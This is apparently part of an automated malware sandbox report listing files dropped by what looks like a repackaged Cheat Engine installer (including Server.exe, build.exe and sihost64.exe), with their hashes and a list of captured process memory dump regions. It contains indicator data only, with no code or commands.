da93950273b0c256dab64bb3bb755ac7c14f17f3

SHA256
3eed2e41bc6ca0ae9a5d5ee6d57ca727e5cba6ac8e8c5234ac661f9080cedadf

SHA512
4183dbb8fd7de5fd5526a79b62e77fc30b8d1ec34ebaa3793b4f28beb36124084533e08b595f77305522bc847edfed1f9388c0d2ece66e6ac8acb7049b48ee86

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
8981df2dd68b9d889cd2ee3cda2d5bd0

SHA1
e824630379e6764a58b83dc5a074070f22edf648

SHA256
fa43ca8e54b4f2d4a1b287c97fa5b6b3b1769b0c7cc373910d78fd3d73a05908

SHA512
74a00d3617f78b5055db30b80069594313e06d7430d85736b8c0b5013c118fbe530076d2025c6cf38b2d75c8bc28954307865a7874b03a771c11584207bac677

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\JP0XTHBXZVHOKLBUC7IZ.temp

Filesize
7KB

MD5
0ee33f7739abcd3e64afc425895c43d9

SHA1
d30bac79a02076d156bad8f191def45e6ebd0c72

SHA256
d3baaadc380331a04a0a45be3c8c9beb5baa0d9f9b0d2a67c17e0b15f03e0fb4

SHA512
50b14d7e6a65360e9c7219c849fe65d0bc88cf39b33f330477b01ee88e7a0b1004169181714f1d0dbcbd2e6d88ef2934778c9d75c864068dc2cbe09464926cd9

Download Submit
\Users\Admin\AppData\Local\Temp\RarSFX0\CheatEngine75.exe

Filesize
3.1MB

MD5
609fea742d34dc1d53f0eeb4873b1a0a

SHA1
3232c52da3cb8f47a870162a35cdd75fcae60aea

SHA256
e2e15826b69778e381f25ac8f2b109a377b23f7cf79b5f482e81f4d28c30f95e

SHA512
27da89901268d153fd7158162fc8f2f3b99ec9a4aa24c281f93b500466552af776b00f0a33182386a62934c3e553561cbc23d3f5ebb0ea0366c04e046e1bcc90

Download Submit
\Users\Admin\AppData\Local\Temp\RarSFX0\Server.exe

Filesize
23KB

MD5
046a99195ebe039bdb825ebd1ce560a4

SHA1
24ccf20694cf13269313d21c5b7bc4e3dff64d7b

SHA256
cc8e70780dc86ab74f1bba933145bd931e69a9334b21c270486b24ec67cbc522

SHA512
c5d1e5d73010283eb2975a52cc49841a3c89dd93e040b20ab5e17f763135af8cf3570dcc6d43cd25d42f117f480f82d359fd56542100f9d76e4e2b8e1c1cdc17

Download Submit
\Users\Admin\AppData\Local\Temp\RarSFX0\build.exe

Filesize
2.5MB

MD5
ad60579bf765225e548e30a8068d03b9

SHA1
87abbf7819cd3e354a24aaeec6e1e2d77b01a72e

SHA256
9c40ef00c2bae13077c19a89a712ed3ba1786096b7360b04a6ca004bf9fc6434

SHA512
e4a26dc6d00e8117060002475861bf8224deeec6f74bedfd9070c8d5bad21cc83ae8bd8230a0a2d2d2267c1ecffa2b532f87792f9d2c3cd1ee3c55ace15d7146

Download Submit
\Users\Admin\AppData\Local\Temp\_MEI17602\api-ms-win-core-file-l2-1-0.dll

Filesize
18KB

MD5
bfffa7117fd9b1622c66d949bac3f1d7

SHA1
402b7b8f8dcfd321b1d12fc85a1ee5137a5569b2

SHA256
1ea267a2e6284f17dd548c6f2285e19f7edb15d6e737a55391140ce5cb95225e

SHA512
b319cc7b436b1be165cdf6ffcab8a87fe29de78f7e0b14c8f562be160481fb5483289bd5956fdc1d8660da7a3f86d8eede35c6cc2b7c3d4c852decf4b2dcdb7f

Download Submit
\Users\Admin\AppData\Local\Temp\_MEI17602\api-ms-win-core-processthreads-l1-1-1.dll

Filesize
21KB

MD5
517eb9e2cb671ae49f99173d7f7ce43f

SHA1
4ccf38fed56166ddbf0b7efb4f5314c1f7d3b7ab

SHA256
57cc66bf0909c430364d35d92b64eb8b6a15dc201765403725fe323f39e8ac54

SHA512
492be2445b10f6bfe6c561c1fc6f5d1af6d1365b7449bc57a8f073b44ae49c88e66841f5c258b041547fcd33cbdcb4eb9dd3e24f0924db32720e51651e9286be

Download Submit
\Users\Admin\AppData\Local\Temp\_MEI17602\ucrtbase.dll

Filesize
992KB

MD5
0e0bac3d1dcc1833eae4e3e4cf83c4ef

SHA1
4189f4459c54e69c6d3155a82524bda7549a75a6

SHA256
8a91052ef261b5fbf3223ae9ce789af73dfe1e9b0ba5bdbc4d564870a24f2bae

SHA512
a45946e3971816f66dd7ea3788aacc384a9e95011500b458212dc104741315b85659e0d56a41570731d338bdf182141c093d3ced222c007038583ceb808e26fd

Download Submit
\Users\Admin\AppData\Local\Temp\is-I7UD9.tmp\botva2.dll

Filesize
37KB

MD5
67965a5957a61867d661f05ae1f4773e

SHA1
f14c0a4f154dc685bb7c65b2d804a02a0fb2360d

SHA256
450b9b0ba25bf068afbc2b23d252585a19e282939bf38326384ea9112dfd0105

SHA512
c6942818b9026dc5db2d62999d32cf99fe7289f79a28b8345af17acf9d13b2229a5e917a48ff1f6d59715bdbcb00c1625e0302abcfe10ca7e0475762e0a3f41b

Download Submit
\Users\Admin\AppData\Local\Temp\is-I7UD9.tmp\zbShieldUtils.dll

Filesize
2.0MB

MD5
fad0877741da31ab87913ef1f1f2eb1a

SHA1
21abb83b8dfc92a6d7ee0a096a30000e05f84672

SHA256
73ff938887449779e7a9d51100d7be2195198a5e2c4c7de5f93ceac7e98e3e02

SHA512
f626b760628e16b9aa8b55e463c497658dd813cf5b48a3c26a85d681da1c3a33256cae012acc1257b1f47ea37894c3a306f348eb6bd4bbdf94c9d808646193ec

Download Submit
\Users\Admin\AppData\Local\Temp\is-UBV4U.tmp\CheatEngine75.tmp

Filesize
2.9MB

MD5
1cdbf6da4defe32c9cb5908968a02fab

SHA1
d1a5eb2928d718d7a1517187f523c701c141b659

SHA256
87c1bb2236a874c97369b2cca0d55559fa917707cebddf7a5eabc691f8302487

SHA512
215697cae7ec2ba27fbc0b9208cb8676e27d21e55e0184fc68cbd1c1bd57863daf29348ea677e97af84628800ba15e6db884df872c3adc673a3cd7faed2888b9

Download Submit
\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe

Filesize
31KB

MD5
8edd8bd78fea19573ddf2d6dc10e5ea3

SHA1
f1d835a1696fddaf770046fa5eba9708bca3e1e0

SHA256
d8dbb7eb7c461222f348f2fbe4505142aa88c0cce3074cd0596f402e89084a1c

SHA512
731c16fb9a2558e9c98505e6252f5235b20f4b2de37512a62a5b2d1876a0f8bfee1ef5f0dde4a4226d399200b1c66286b9406ec3e5f1476c8cea3a0eab51f506

Download Submit
memory/1984-337-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/1984-328-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/1984-321-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/1984-338-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/1984-311-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/1984-335-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/1984-323-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/1984-327-0x000007FFFFFDD000-0x000007FFFFFDE000-memory.dmp

Filesize
4KB

Download
memory/1984-320-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/1984-317-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/1984-309-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/1984-303-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/1984-330-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/1984-326-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/1984-331-0x0000000000070000-0x0000000000090000-memory.dmp

Filesize
128KB

Download
memory/1984-306-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/1984-301-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/1984-313-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/1984-336-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/1984-315-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/1984-334-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/2012-305-0x000000001B2B0000-0x000000001B592000-memory.dmp

Filesize
2.9MB

Download
memory/2012-308-0x0000000002320000-0x0000000002328000-memory.dmp

Filesize
32KB

Download
memory/2036-260-0x000000001B310000-0x000000001B5F2000-memory.dmp

Filesize
2.9MB

Download
memory/2036-261-0x00000000020B0000-0x00000000020B8000-memory.dmp

Filesize
32KB

Download
memory/2116-60-0x0000000019B60000-0x0000000019E42000-memory.dmp

Filesize
2.9MB

Download
memory/2116-61-0x0000000000880000-0x0000000000888000-memory.dmp

Filesize
32KB

Download
memory/2132-48-0x000000001B190000-0x000000001B472000-memory.dmp

Filesize
2.9MB

Download
memory/2132-49-0x00000000020D0000-0x00000000020D8000-memory.dmp

Filesize
32KB

Download
memory/2376-84-0x00000000000B0000-0x0000000001E6F000-memory.dmp

Filesize
29.7MB

Download
memory/2376-151-0x00000000207A0000-0x000000002255E000-memory.dmp

Filesize
29.7MB

Download
memory/2392-25-0x0000000074750000-0x0000000074CFB000-memory.dmp

Filesize
5.7MB

Download
memory/2392-34-0x0000000074750000-0x0000000074CFB000-memory.dmp

Filesize
5.7MB

Download
memory/2392-26-0x0000000074750000-0x0000000074CFB000-memory.dmp

Filesize
5.7MB

Download
memory/2392-24-0x0000000074751000-0x0000000074752000-memory.dmp

Filesize
4KB

Download
memory/2400-294-0x0000000002290000-0x0000000002298000-memory.dmp

Filesize
32KB

Download
memory/2400-293-0x000000001B2B0000-0x000000001B592000-memory.dmp

Filesize
2.9MB

Download
memory/2448-257-0x0000000000400000-0x00000000004CC000-memory.dmp

Filesize
816KB

Download
memory/2448-279-0x0000000000400000-0x00000000004CC000-memory.dmp

Filesize
816KB

Download
memory/2640-174-0x000007FEF7010000-0x000007FEF75F8000-memory.dmp

Filesize
5.9MB

Download
memory/2640-182-0x000007FEF7010000-0x000007FEF75F8000-memory.dmp

Filesize
5.9MB

Download
memory/2728-368-0x0000000001B30000-0x0000000001B36000-memory.dmp

Filesize
24KB

Download
memory/2792-180-0x000000001B340000-0x000000001B622000-memory.dmp

Filesize
2.9MB

Download
memory/2792-181-0x0000000001DF0000-0x0000000001DF8000-memory.dmp

Filesize
32KB

Download
memory/2952-280-0x0000000000400000-0x00000000006EE000-memory.dmp

Filesize
2.9MB

Download
memory/3036-78-0x0000000000340000-0x0000000000360000-memory.dmp

Filesize
128KB

Download
memory/3036-74-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/3036-80-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/3036-81-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/3036-82-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/3036-77-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/3036-75-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/3036-76-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/3036-83-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/3036-79-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/3036-73-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/3036-72-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/3036-71-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/3044-62-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/3044-63-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/3044-64-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/3044-65-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/3044-66-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/3044-69-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download